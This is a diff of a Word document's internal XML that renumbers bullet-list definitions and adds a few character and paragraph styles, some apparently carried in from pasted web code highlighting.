+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="554B6765"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="A4748484"/>
@@ -7594,7 +11354,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="624E23D3"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="4314EAD6"/>
@@ -7743,7 +11503,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="70862669"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="905C9306"/>
@@ -7892,7 +11652,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="735C5A75"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="25A69786"/>
@@ -8041,7 +11801,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7BBC24FE"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="D4545CAA"/>
@@ -8159,55 +11919,73 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="372534517">
-    <w:abstractNumId w:val="2"/>
+    <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="1032456006">
-    <w:abstractNumId w:val="7"/>
+    <w:abstractNumId w:val="9"/>
   </w:num>
   <w:num w:numId="3" w16cid:durableId="341207110">
-    <w:abstractNumId w:val="8"/>
+    <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="4" w16cid:durableId="1781755521">
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="5" w16cid:durableId="1041436590">
-    <w:abstractNumId w:val="3"/>
+    <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="6" w16cid:durableId="900216104">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="13"/>
   </w:num>
   <w:num w:numId="7" w16cid:durableId="1019964713">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="22"/>
   </w:num>
   <w:num w:numId="8" w16cid:durableId="1484470449">
-    <w:abstractNumId w:val="13"/>
+    <w:abstractNumId w:val="19"/>
   </w:num>
   <w:num w:numId="9" w16cid:durableId="1291015917">
-    <w:abstractNumId w:val="15"/>
+    <w:abstractNumId w:val="21"/>
   </w:num>
   <w:num w:numId="10" w16cid:durableId="1672559506">
+    <w:abstractNumId w:val="14"/>
+  </w:num>
+  <w:num w:numId="11" w16cid:durableId="1474713910">
+    <w:abstractNumId w:val="20"/>
+  </w:num>
+  <w:num w:numId="12" w16cid:durableId="503906434">
+    <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="13" w16cid:durableId="43414209">
     <w:abstractNumId w:val="11"/>
   </w:num>
-  <w:num w:numId="11" w16cid:durableId="1474713910">
-    <w:abstractNumId w:val="14"/>
+  <w:num w:numId="14" w16cid:durableId="1739327642">
+    <w:abstractNumId w:val="7"/>
   </w:num>
-  <w:num w:numId="12" w16cid:durableId="503906434">
+  <w:num w:numId="15" w16cid:durableId="1574585887">
     <w:abstractNumId w:val="6"/>
   </w:num>
-  <w:num w:numId="13" w16cid:durableId="43414209">
-    <w:abstractNumId w:val="9"/>
-  </w:num>
-  <w:num w:numId="14" w16cid:durableId="1739327642">
-    <w:abstractNumId w:val="5"/>
-  </w:num>
-  <w:num w:numId="15" w16cid:durableId="1574585887">
-    <w:abstractNumId w:val="4"/>
-  </w:num>
   <w:num w:numId="16" w16cid:durableId="241373396">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="18"/>
   </w:num>
   <w:num w:numId="17" w16cid:durableId="1858811753">
     <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="18" w16cid:durableId="1994139378">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="19" w16cid:durableId="836920720">
+    <w:abstractNumId w:val="16"/>
+  </w:num>
+  <w:num w:numId="20" w16cid:durableId="374619095">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="21" w16cid:durableId="1894121671">
+    <w:abstractNumId w:val="12"/>
+  </w:num>
+  <w:num w:numId="22" w16cid:durableId="1169561084">
+    <w:abstractNumId w:val="17"/>
+  </w:num>
+  <w:num w:numId="23" w16cid:durableId="908074800">
+    <w:abstractNumId w:val="15"/>
   </w:num>
 </w:numbering>
 </file>
@@ -9179,6 +12957,55 @@
       <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c">
+    <w:name w:val="pl-c"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:rsid w:val="007E5D8B"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s">
+    <w:name w:val="pl-s"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:rsid w:val="007E5D8B"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="pl-pds">
+    <w:name w:val="pl-pds"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:rsid w:val="007E5D8B"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="pl-k">
+    <w:name w:val="pl-k"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:rsid w:val="007E5D8B"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c1">
+    <w:name w:val="pl-c1"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:rsid w:val="007E5D8B"/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="NormalWeb">
+    <w:name w:val="Normal (Web)"/>
+    <w:basedOn w:val="Normal"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="007E5D8B"/>
+    <w:pPr>
+      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:kern w:val="0"/>
+      <w:sz w:val="24"/>
+      <w:szCs w:val="24"/>
+      <w:lang w:eastAsia="en-IN"/>
+      <w14:ligatures w14:val="none"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="bzpyqfadein">
+    <w:name w:val="bz_pyq_fadein"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:rsid w:val="007E5D8B"/>
+  </w:style>
 </w:styles>
 </file>
 
